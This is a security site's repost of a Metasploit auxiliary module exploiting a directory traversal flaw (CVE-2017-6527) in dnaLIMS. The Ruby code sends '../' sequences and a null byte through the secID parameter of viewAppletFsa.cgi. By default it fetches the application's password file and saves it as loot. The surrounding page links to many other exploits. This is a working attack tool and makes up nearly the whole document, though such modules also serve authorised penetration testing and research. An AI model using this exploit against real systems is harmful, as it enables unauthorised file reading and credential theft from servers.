首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
dnaLIMS Directory Traversal Exploit
来源:metasploit.com 作者:h00die 发布时间:2017-04-05  
##
# This module requires Metasploit: http://metasploit.com/download
##
  
require 'msf/core'
  
class MetasploitModule < Msf::Auxiliary
  
  include Msf::Auxiliary::Scanner
  include Msf::Auxiliary::Report
  include Msf::Exploit::Remote::HttpClient
  
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'DnaLIMS Directory Traversal',
      'Description'    => %q{
          This module exploits a directory traversal vulnerability found in dnaLIMS.
        Due to the way the viewAppletFsa.cgi script handles the 'secID' parameter, it is possible
        to read a file outside the www directory.
      },
      'References'     =>
        [
          ['CVE', '2017-6527'],
          ['US-CERT-VU', '929263'],
        ],
      'Author'         =>
        [
          'h00die <mike@shorebreaksecurity.com>',    # Discovery, PoC
          'flakey_biscuit <nicholas@shorebreaksecurity.com>'  # Discovery, PoC
        ],
      'License'        => MSF_LICENSE,
      'DisclosureDate' => "Mar 8 2017"
    ))
  
    register_options(
      [
        OptString.new('TARGETURI', [true, 'The base path to dnaLIMS', '/cgi-bin/dna/']),
        OptString.new('FILE', [ true"The path to the file to view", '/home/dna/spool/.pfile']), # password db for app
        OptInt.new('DEPTH', [true, 'The traversal depth', 4])
      ], self.class)
  
    deregister_options('RHOST')
  end
  
  
  def run_host(ip)
    file     = (datastore['FILE'][0,1] == '/') ? datastore['FILE'] : "#{datastore['FILE']}"
    traverse = "../" * datastore['DEPTH']
    uri      = normalize_uri(target_uri.path)
    base     = File.dirname("#{uri}/.")
  
    print_status("Requesting: #{file} - #{rhost}")
    res = send_request_cgi({
      'uri'      => "#{base}/viewAppletFsa.cgi",
      'vars_get' => { 'secID' => "#{traverse}#{file}%00",
                     'Action' => 'blast',
                    'hidenav' => '1'
      }
    })
  
    if not res
      print_error("No response from server.")
      return
    end
  
    if res.code != 200
      print_error("Server returned a non-200 response (body will not be saved):")
      print_line(res.to_s)
      return
    end
  
    vprint_good(res.body)
    p = store_loot('dnaLIMS.traversal.file', 'application/octet-stream', ip, res.body, File.basename(file))
    print_good("File saved as: #{p}")
  end
  
end

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Apple macOS/IOS 10.12.2(16C67)
·dnaLIMS Admin Module Command E
·Sync Breeze Enterprise 9.5.16
·Easy File Sharing FTP Server 3
·EyesOfNetwork (EON) 5.1 - SQL
·BackBox OS - Denial of Service
·Sync Breeze Enterprise 9.5.16
·Apache Tomcat 6/7/8/9 - Inform
·DiskBoss Enterprise 7.8.16 - '
·Bluecoat ASG 6.6/CAS 1.3 - OS
·Bluecoat ASG 6.6/CAS 1.3 - Pri
·Disk Sorter Enterprise 9.5.12
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved